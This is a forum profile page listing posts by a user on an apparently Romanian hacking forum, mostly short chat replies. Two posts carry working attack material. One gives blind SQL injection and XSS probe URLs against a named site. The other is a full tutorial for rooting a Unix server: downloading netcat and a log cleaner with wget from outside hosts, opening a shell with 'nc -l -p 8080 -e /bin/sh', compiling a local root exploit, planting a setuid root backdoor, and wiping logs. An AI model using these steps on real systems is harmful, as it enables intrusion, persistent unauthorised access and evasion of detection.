Jump to content

Raven

Active Members
 View Profile  See their activity

  • Posts

    394

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by Raven

  1. Raven

    La multi ani ba!

    Raven replied to N-W-A's topic in Off-topic

    thanks all pentru urari
  2. Raven
    Ce eroare? Nu poti sa downloadezi doarece a fost sters de pe server....
  3. Raven
    Cu referire la tine pax?
  4. Raven
    Sti sa citesti? ii trebuie pentru un booter yahoo!
  5. Raven

    Conquiztador

    Raven replied to gicutu's topic in Cosul de gunoi

    conqiztador ii pentru cei care nu au ce face si se cred destepti....
  6. Raven

    Hi :)

    Raven replied to eXiLe's topic in Bine ai venit

    bun venit
  7. Raven
    ########################################################################### ______ __ __ ______ __ ______ / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ /____/ EgY Coders Vulnerability Research TM # [~] Discovered by : Hakxer # [~] Type Gap : Blind Sql inj / XSS # [~] Script :MatPo Link 1.2b # [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk ########################################################################## || Blind Sql Inj || POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL] Exploit : http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False || Cross Site Scripting || Poc: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS] Exploit http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema= # Proud To be a Muslim # #_=END=_#
  8. Raven
    frumos felicitari de asta chiar nu stiam
  9. Raven
    good this community has no IRC channel but has chat AJAX Chat
  10. Raven
    DOWNLOAD: http://rapidshare.com/files/159458313/mysql_into_outfile.rar
  11. Raven
    Credits goes to : w3tw0rk Hello and welcome to w3tw0rks tutorial on rooting unix boxes. Today we will learn a few fundementals on what it takes to root a your box! In Todays Tutorial we will be using a linux box. Required for this tutorial: Access to a shell - Upload by any-means a shell onto a box mig-log cleaner - http://b14ck1c3.freehostia.com/miglc Netcat - http://www.vulnwatch.org/netcat/nc111nt.zip Netcat(unix) - http://b14ck1c3.freehostia.com/nc Local Root Exploit - http://jshooter.by.ru/xpl/ half a brain willingness to learn Now that you have all that in order lets begin. Go to the path of or access your shell by whatever means nessecary. Make sure that your shell is in a writable folder just to make things easy for us. In our case today for this tutorial we will be using storm7shell not exactly my favorite but will get the job done none the less. An example of this location would be something like: http://target/youshell.php Now that we are on your shells page we want to find out what os this box is running and what version the kernel is. In our case it's linux 2.6.8. So we will want to find a local root exploit for this kernel version of the linux os. What we want to do now that we have our local root exploit for our kernel is spawn a shell so that we can talk to the victim's box and run our commands without interuption, But how are we suppose to do that? This can be done by using a tool called Netcat. So now that we have a copy of Netcat we will go to the shell, Find the command execution area of the shell and enter: wget http://b14ck1c3.freehostia.com/nc What this will do is download the file of Netcat i have pre-compiled and hosted for you onto the victim box to the location of your shell. Once we have the download complete we will want to chmod it so that our user has access to run it. which can be done by entering: chmod +x nc What this does is grants everyone (user, group and other) execute permission, and the command to the file nc which we had just previously downloaded onto the box with the wget command. Now that we have nc installed on both the victim machine and your own it's time to make our connection. How Do we make a connection with nc? In the command execution area of your shell enter: ./nc -l -p 8080 -e /bin/sh (shell can be /bin/sh or cmd.exe for example) And then on the netcat installed on your pc you will want to enter: nc VictimIP Port *in our case 8080* eg 123.123.123.123 8080 What this will do is cause the netcat on the victims box to listen on port 8080 and shovel back an interactive shell for you once you make the connection from which you typed: nc victimip port Now that We have our interactive shell spawned we can start to prepare the box for rooting. First we will want to get our local root exploit onto the box and get it compiled if it's not already. This can be done by once again using that nifty wget command we learned about in the previous steps. wget http://yoursite/xpl What we have done is now downloaded your exploit. If your exploit is not already compiled you will need to compile it in order to run it. Compiling your exploit can be done by using the gcc, like so: gcc xpl.c -o xpl;chmod +x xpl This will compile your xpl.c and output it into a file called xpl wich will be the compiled copy of your exploit and then chmod xpl. Now you are ready to run your exploit and get your root on. The exploit will vary on their usage so make sure you have an understanding of the root exploit you are using. You can run your xpl file by entering in: ./xpl Wait until your exploit is finished running once it is done enter: whoami What the whoami command does is tells you who you are if this tells you root then you xpl has done it's job and you now have root priv's on the box. or you can type: id which will give you something like: uid=0(root) gid=0(root) groups=500(apache) or something similar And now you can do your happy dance. Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make sure that we can come and go as we please without all the hassel of rooting the box over and over. So we will want to create some kind of backdoor. we can make this happen with few lines of code: #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main( void ) { setuid( 0 ); system( "/bin/bash" ); return 0; } Compile it and change permissions: root@foobar /root# gcc -o .bkdr main.c root@foobar /root# chown root:root .bkdr root@foobar /root# chmod +s .bkdr Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably in the $PATH) and if you execute it as another user: raif@foobar /home/raif$ /usr/local/bin/.bkdr root@foobar /home/raif# whoami root Now you have your access back. Alright we are almost completed our mission we have successfully rooted our victims box created our backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you can get here: http://b14ck1c3.freehostia.com/miglc Once again we can use our wget command to upload our logcleaner to the rooted box. wget http://b14ck1c3.freehostia.com/miglc;chmod +x miglc now just run the logcleaner ./miglc The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner so you may choose how exactly you want to clean the logs with the commands given to you. I hope you
  12. Raven

    CQ killer

    Raven replied to adetcc's topic in Cosul de gunoi

    daca taceai filozof ramaneai )))))))))))))
  13. Raven
    download : http://rapidshare.com/files/159460572/autopwn.wmv
  14. Raven
    http://www.offensive-security.com/movies/vistahack/vistahack.html
  15. Raven
    Faci diferenta intre *.3xforum si myforum?
  16. Raven
    Conform avocatului acestuia, autoritatile de la Bucuresti regreta ca au acceptat cu usurinta extradarea tanarului sclipitor. Baiatul are mari sanse sa fie gratiat de presedintele Georgio Napoletano si chiar sa se angajeze. Gabriel Bogdan Ionescu, in varsta de 22 de ani, a fost arestat in decembrie 2007 la Craiova, impreuna cu alti hackeri romani. Toti au fost acuzati atunci de fraude pe internet. Mai precis, au trimis e-mail-uri posesorilor de conturi la Posta italiana, cerandu-le acestora sa isi dezvaluie datele personale. Potrivit presei italiene, tinerii ar fi obtinut prin aceasta metoda intre 100.000 si 200.000 de euro. Olimpic la matematica si castigator al Olimpiadei Balcanice de Informatica, Gabriel Bogdan a fost extradat in Italia ca sa isi ispaseasca sentinta, 3 ani de inchisoare. Aflat in penitenciarul Bassone din nordul Italiei, romanul a obtinut permisiunea sa participe la concursul de admitere al Universitatii Politehnice din Milano. Ocazie pe care a exploatat-o cum a stiut mai bine. Brusc, romanul si-a facut o gramada de fani in presa din Peninsula. Potrivit cotidianului italian Il Giornale, autoritatile de la Bucuresti si-au dat seama abia acum cat este de valoros si incearca sa repare greseala. Tanarul catalogat drept geniu are si oferta de munca. Se pare ca sefii unei companii importante de software s-au grabit sa semneze un contract cu el. Sursa : protv.ro
  17. Raven
    omg super ideea gg
  18. Raven

    Greva

    Raven replied to paxnWo's topic in Off-topic

    Nu ar da dumnezeu ? si maica sfanta?
  19. Raven
    LOL motive ar avea... cu sutele ... Daca au inchis darkmarket de ce nu sar lega si de warez-bb sau altele?
  20. Raven
    Le-au inchis domeniul... Nu cred ca este adevarat ... Sau daca este adevarat... nu cred ca au aflat locatia adminilor..
  21. Raven
    )) sti ce inseamna un browser?
  22. Raven
    clar ca acum e detectat de toate av-urile!
  23. Raven
    firefox :D
  24. Raven
    Si ce legatura are asta cu "programe de h4ck"?
  25. Raven
    A fost pus in loc de phpBB vBuletin... Asta cred ca este motivul...
×
×
  • Create New...